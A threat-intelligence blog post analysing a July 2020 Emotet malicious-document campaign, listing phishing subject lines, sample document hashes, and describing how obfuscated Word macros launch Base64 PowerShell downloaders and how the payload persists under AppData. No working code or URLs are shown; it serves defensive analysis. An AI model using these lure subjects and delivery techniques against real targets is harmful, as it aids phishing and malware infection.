Emotet Maldoc Campaign — July 2020

5 min readSep 11, 2020

Summary

Emotet is commonly known as one of the most popular and widely used Trojan’s and delivery networks observed in the wild. In 2019, Emotet accounted for a large majority of sandbox submissions observed at any.run and not by a small margin. Emotet was first observed in campaigns as early as 2014. Original capabilities focused mostly on information stealing. As development continued over the years, Emotet’s capabilities have expanded, containing a number of other modules to help establish a foothold and spread laterally, most recently with modules to spread over Wi-Fi connections. Emotet campaigns are also commonly seen delivering other malware such as Trickbot and Qakbot(QBot).

It was over 160 days since fresh Emotet campaigns were observed, according to researchers at Proofpoint. The last set of campaigns seemed to come to a halt after researchers at JP-CERT released a utility for detection back in early February. On July 17th, Cryptolaemus, a group of researchers who focus efforts on tracking Emotet, published information derived from Spamhaus on the botnets that suggested upcoming campaigns due to observed activity.

Shortly after the activity was discovered, Emotet malicious spam and document campaigns begun. As seen with previous campaigns the emails contain a macro-embedded Word document or URL to one using compromised WordPress hosts. Documents leveraged PowerShell to download the second stage of the infection.

Analysis

The Emotet phishing emails tend to vary between senders, subjects and message body. Some emails use URLs to the macro Word document whereas others have them attached. Intelligence collected from vendors and information sharing communities show many common subjects being used that include keywords such as Invoice, Response and Purchase Order. Examples of some subjects include:

Scan
Payroll
Invoice #xxxxxx
Inv #xxxxxx
‘Target’s Name”
Call me
Payoff Error Refund
Log in form
Please approve

Sample message body from earlier campaigns can be observed below

Most of the emails contain links to the Word document as opposed to attachments.

URLs in the messages can be queried against Abuse.ch’s URLhaus. This service is one of the primary sharing channels used by the researchers tracking Emotet making it a good first OSINT choice if Emotet is suspected.

The results are tagged accordingly and even provide the associated epoch. An epoch is essentially the classification of a distinct Emotet botnet. Epoch 1, Epoch 2 and Epoch 3 support independent infrastructure with different timelines and timescale of releases for updates. Each epoch also contains a unique RSA public key for decoding messages from C2. Abuse.ch also facilitates abuse reports to providers once submitted so many of the URLs may be taken down shortly after submission. For the URLs that were not down, navigation resulted in the download of a macro-embedded Word document in all cases. A number of documents were analyzed and are listed below.

invoice.doc (MD5: cb70ec7f00f0a05fe5c0f5f59892e1a3)
Contract 07172020.doc (MD5: de91a9d6693ed342c68c4e146b5cbf12)
Form.doc (MD5: 38a19b0da844c18ca52ac34d95c4523c)
W-9.doc (MD5: 3fbbf63b4d3d9de4b4ea5d55eff60d88)
invoice1.doc (MD5: badf3dd80fb8a2a90b39fb60221bb5f8)

One method to find documents associated with the latest Emotet campaign is to use the tag ‘emotet-doc’ in a public submission search on app.any.run.

Although few common indicators exist across the campaign, all of the documents appeared the same visually in early stages of the campaign and had a similar obfuscated VBS resulting in a PowerShell script that attempts to download the payload from at least five distinct URLs.

Analysis of one of the samples (MD5:cb70ec7f00f0a05fe5c0f5f59892e1a3) using oledump and olevba yield the following results indicating a few different possible obfuscation methods.

The VBA macros are then identified by running Oledump against the document.

Looking further into the largest macro shows some of the obfuscated code, techniques and associated functions.

These can be deobfuscated to reveal the five distinct URLs used by the Base64 encoded PowerShell or dynamic analysis can provide the same information. FakeDNS services are leveraged here to show the document attempting to cycle through all of the URLs.

The number of URLs in each epoch continues to grow. Data collected on the 21st of July had 179 URLs in Epoch 1, 296 in Epoch 2, and 104 in Epoch 3. Comprehensive lists of IOCs are provided courtesy of the Cryptolaemus Team.

Next, we will look into one of the executables downloaded onto the machine. At the time of the writing, there has been evidence of Emotet/Geodo, Trickbot and Qakbot being delivered through the campaign. The sample referenced in this report was identified as a packed Emotet due to signature matching and code reuse (MD5:108bead4a9ac8f250cdeb59be183547d).

The observed binary was copied to a newly created folder under Appdata/Local. Other samples copied themselves to the Appdata/Local/Temp directory and spawned processes. For more in-depth analysis on registry activity, API calls, process analysis and strings please visit the multiple sandbox submissions listed below in the supporting analysis section.

The remainder of the analysis introduces the capa tool. Recently released by Fireeye’s FLARE team, capa provides a framework for the community to encode, recognize, and share behaviors in malware. Analysts can quickly triage unknown binaries to gain insights into the capabilities of the examined file. Capabilities are mapped to the popular Mitre Att&ck Framework.

Of the files analyzed, the results in capa were identical across samples, detecting capabilities such as obfuscation, encrypted data, clipboard access and more. As this is a packed sample, it’s likely that further capabilities would be detected on unpacked code.